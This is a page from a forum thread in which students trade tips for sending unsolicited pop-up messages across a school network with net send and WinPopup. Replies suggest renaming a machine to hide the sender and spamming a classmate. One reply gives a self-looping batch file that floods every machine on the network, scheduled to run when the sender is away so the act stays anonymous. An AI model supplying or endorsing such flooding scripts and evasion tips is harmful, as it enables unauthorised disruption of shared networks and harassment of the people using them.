Page 2 of 3 FirstFirst 123 LastLast

Thread: Question from a Newbie

if your network doesn't have a server (just a workgroup),
    you could change the name of your machine to say 'lamer' (assuming you have the rights to do that), send a handful of silly messages then change the name back, reboot and play innocent.

That may work.

J.

PS. Stopping the Messenger service will stop you recieving silly pop-up's from the net send command if thats all you want.

it worked!!

Thanks everyone

I tried the net send command today and it worked :]
    Instead of using the wild card[*] I instead typed a classmates user name and they got the message.

Thanks again :]

[Yes my college uses novell]

i was not able to change my user name though.....if we change things like that we get a $400 fine!!!!

:[ :[

i can think of so many more uses for 400 bucks...a new hard drive maybe? hehe

Thanks again

is winpopup strictly network based or could I send a message to any user pending they have the program running?
    [shadow]Prepare ship for ludicrous speed![/shadow]

Winpopup uses Netbios (and Netbios over other protocols.)

In order to recieve the message, the user has to have winpopup.exe running, and also, you have to send it to the correct user or workgroup. In other words, you have to be able to see them in network neighborhood in order to send things to them. You can try finding their IP address and adding it to the lmhosts cache file, then running nbtstat -R to reload it, and then sending it to the computer name you specified in the cache file... I oughta try that.
    [HvC]Terr: L33T Technical Proficiency

net send doesn't support tcp/ip, at least with nt4, I havent played with it much since. It will resolve tcp/ip to the netbios name and send to that, but it will not allow you to send over a routed network (has to be bridged). Modifying the hosts file will not stop this.

Thanks, for the tip jcdux, will change the node name and spam the hell out of him!

Shkuey, just a note to let you know that i have been using netsend on an NT4 workstation and going via NT 4 server and have had no probs at all! - try the syntax again

DaveH
    -----------------------------
    it\'s all 1001011001 to me!

if it's novell just send something back like "stop it luser"

how to do that?

make a new shortcut to //server (at my school this is fs1, it appears right after the login screen like this
    connecting to fs1
    or something)
    then right click it and select send message than you get a list with computers

this works at my school because they are to stupid to turn it of
    you have a change that your massage sais were it came from

and i'm to stupid to learn english

An Idea ...

You say net send works ....

if you make a simple batch file (check the post in tut for more info on batch files) that looks like so:

@echo off
    net send * Welcome to hell...
    c:\location_of_file\name_of_file.bat
    @echo on

The star means all computers on the network (replace with I.P to attack one single computer.

MAKE SURE YOU SAVE IT ON THE HARD DRIVE

what this will do is send a message to everyones computer, and then run the batch file again, sending the message once again to everyones computer and so on.

Then to ensure annonymity ... make it a scheduled task to run that file at a time when you are not at school/college whatever.

Have fun, just be carefull with it as this will really wind your sys admin up.

Windows does not have enough free memory to run this program.

I will never intentionally abuse this board. However, when adding AntiPoints please be a man/woman and leave your name so we can discuss why you did so. I shall also leave my name on all points i send. Thankyou.